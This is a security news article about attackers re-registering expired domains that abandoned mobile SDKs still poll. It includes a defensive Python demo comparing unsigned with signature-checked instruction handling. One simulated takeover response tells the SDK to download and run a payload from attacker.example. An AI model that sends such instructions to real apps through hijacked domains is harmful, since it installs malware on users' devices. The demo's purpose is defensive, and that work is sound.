Expired domains present an opportunity for malicious activity
Experts said expired domains are often purchased with the intent of advertising, but researchers noted that these domains, together with the abandoned SDKs that still call out to them, present an opportunity for threat actors to target mobile users.
Zhi Xu and Tongbo Luo, researchers for Palo Alto Networks, described the risks during a talk at the Virus Bulletin International Conference in Denver. According to Xu and Luo, many third-party app software development kits (SDKs) have been abandoned by their developers, but the apps that embed them are still available to users. Those apps keep trying to contact command-and-control (C&C) servers at domains that have since expired, and an expired domain can be re-registered and repurposed for malicious activity.
"Hundreds of these SDK companies were startups existing at one time, but many of these startups died and no one is maintaining this infrastructure. A large part of this infrastructure is unmaintained," Xu said at the conference. "If unmaintained, the apps including these SDKs will try to talk to the master server for instructions and get no response. As domains expire, attackers can take over these domains and infrastructure, and send malicious instructions and content."
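The takeover scenario Xu describes hinges on one design flaw: the SDK treats "the response came from our domain" as authentication, so whoever re-registers the domain inherits the SDK's trust. The following is an added example, not code from the Virus Bulletin talk or from any real SDK, contrasting that legacy pattern with an SDK that pins the vendor's public key and only acts on signed instructions. The network and DNS are replaced with plain dicts so it runs offline, and the key pair, domain names and instruction payloads are constructed for illustration; the toy RSA arithmetic exists only to keep the script dependency-free, and a shipping SDK would pin an Ed25519 or RSA-2048+ key and verify with a vetted library.

```python
# Added example, not code from the Virus Bulletin talk or from any real SDK.
# It contrasts an SDK that trusts whatever its (possibly expired) C&C domain
# returns with one that pins the vendor's public key and verifies a signature
# on every instruction. Network and DNS are replaced by plain dicts so the
# script runs offline; the key pair and payloads below are constructed.
import hashlib
import json

# Toy RSA key pair used only to keep the example dependency-free.
# The primes are far too small for real use: a shipping SDK would pin an
# Ed25519 or RSA-2048+ key and verify with a vetted library.
_P, _Q = 104729, 1299709
_N, _E = _P * _Q, 65537
_D = pow(_E, -1, (_P - 1) * (_Q - 1))
VENDOR_PUBLIC_KEY = (_N, _E)      # baked into the app at build time
_VENDOR_PRIVATE_KEY = (_N, _D)    # stays on the vendor's signing host


def _digest(payload: bytes, n: int) -> int:
    # SHA-256 of the payload, reduced so it fits the toy modulus.
    return int.from_bytes(hashlib.sha256(payload).digest(), "big") % n


def vendor_sign(payload: bytes, private_key=_VENDOR_PRIVATE_KEY) -> int:
    n, d = private_key
    return pow(_digest(payload, n), d, n)


def verify(payload: bytes, signature: int, public_key=VENDOR_PUBLIC_KEY) -> bool:
    n, e = public_key
    return pow(signature, e, n) == _digest(payload, n)


def legacy_sdk_poll(response: dict) -> dict:
    """Vulnerable pattern: the domain name is the only 'authentication',
    so whoever re-registers the expired domain controls the instructions."""
    return json.loads(response["body"])


def hardened_sdk_poll(response: dict, public_key=VENDOR_PUBLIC_KEY):
    """Hardened pattern: instructions are accepted only if signed by the
    pinned vendor key. Control of the domain alone is not enough."""
    body, sig = response.get("body"), response.get("sig")
    if body is None or sig is None or not verify(body, sig, public_key):
        return None            # unsigned or forged: ignore, keep defaults
    return json.loads(body)


# Constructed traffic: what the SDK sees before and after domain takeover.
def vendor_response() -> dict:
    body = json.dumps({"action": "set_ad_refresh", "seconds": 30}).encode()
    return {"body": body, "sig": vendor_sign(body)}


def takeover_response() -> dict:
    # The new domain owner can serve any body but has no vendor private key,
    # so the best it can do is attach a bogus signature.
    body = json.dumps({"action": "download_and_run",
                       "url": "http://attacker.example/payload"}).encode()
    return {"body": body, "sig": 123456789}


def replay_response() -> dict:
    # Re-using a genuine signature on a different body also fails verification.
    return {"body": takeover_response()["body"], "sig": vendor_response()["sig"]}


if __name__ == "__main__":
    print("legacy SDK after takeover:", legacy_sdk_poll(takeover_response()))
    print("hardened SDK, vendor     :", hardened_sdk_poll(vendor_response()))
    print("hardened SDK, takeover   :", hardened_sdk_poll(takeover_response()))
    print("hardened SDK, replay     :", hardened_sdk_poll(replay_response()))
```

One residual risk the hardened form does not close: the new domain owner can replay the vendor's last genuinely signed response indefinitely, so signed instructions should also carry an expiry time or nonce that the SDK checks. The other half of the fix is operational rather than cryptographic: an SDK reaching end of life should stop polling, and app developers should inventory which third-party domains their builds still contact.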